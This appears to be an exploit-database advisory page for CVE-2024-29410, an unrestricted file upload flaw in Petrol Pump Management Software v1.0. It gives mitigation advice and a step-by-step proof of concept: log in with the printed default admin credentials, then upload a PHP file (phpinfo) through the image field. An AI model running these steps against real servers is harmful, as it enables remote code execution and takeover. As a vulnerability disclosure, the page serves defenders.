header-logo
Suggest Exploit
vendor:
Petrol Pump Management Software
by:
Sandeep Vishwakarma
6.1
CVSS
HIGH
Remote Code Execution (RCE)
434
CWE
Product Name: Petrol Pump Management Software
Affected Version From: v1.0
Affected Version To: v1.0
Patch Exists: NO
Related CWE: CVE-2024-29410
CPE: a:petrol_pump_management_software:petrol_pump_management_software:1.0
Metasploit:
Other Scripts:
Platforms Tested: Windows 10
2024

Petrol Pump Management Software v1.0 – Remote Code Execution (RCE)

Petrol Pump Management Software v1.0 is vulnerable to Remote Code Execution (RCE) due to a file upload flaw. An attacker can upload a malicious payload to the logo Photos parameter in the web_crud.php component, allowing them to execute arbitrary code on the server. By exploiting this vulnerability, an attacker can potentially take full control of the application.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user inputs, restrict file upload types, implement proper file upload handling mechanisms, and regularly update the software to patch security flaws.
Source

Exploit-DB raw data:

# Exploit Title: Petrol Pump Management Software v1.0 - Remote Code Execution (RCE)
# Date: 02/04/2024
# Exploit Author: Sandeep Vishwakarma
# Vendor Homepage: https://www.sourcecodester.com
# Software Link:https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html
# Version: v1.0
# Tested on: Windows 10
# CVE: CVE-2024-29410
# Description: File Upload vulnerability in Petrol Pump Management Software v.1.0 allows an attacker to execute arbitrary code via a crafted payload to the logo Photos parameter in the web_crud.php component.
# POC:
1. Here we go to : http://127.0.0.1/fuelflow/index.php
2. Now login with default username=mayuri.infospace@gmail.com and Password=admin
3. Now go to "http://127.0.0.1/fuelflow/admin/web.php"
4. Upload the san.php file in "Image" field
5. Phpinfo will be present in "http://localhost/fuelflow/assets/images/phpinfo.php" page
6. The content of san.php file is given below: <?php phpinfo();?>

# Reference:
https://github.com/hackersroot/CVE-PoC/blob/main/CVE-2024-29410.md

Navigation

Suggest Exploit

Services By CQR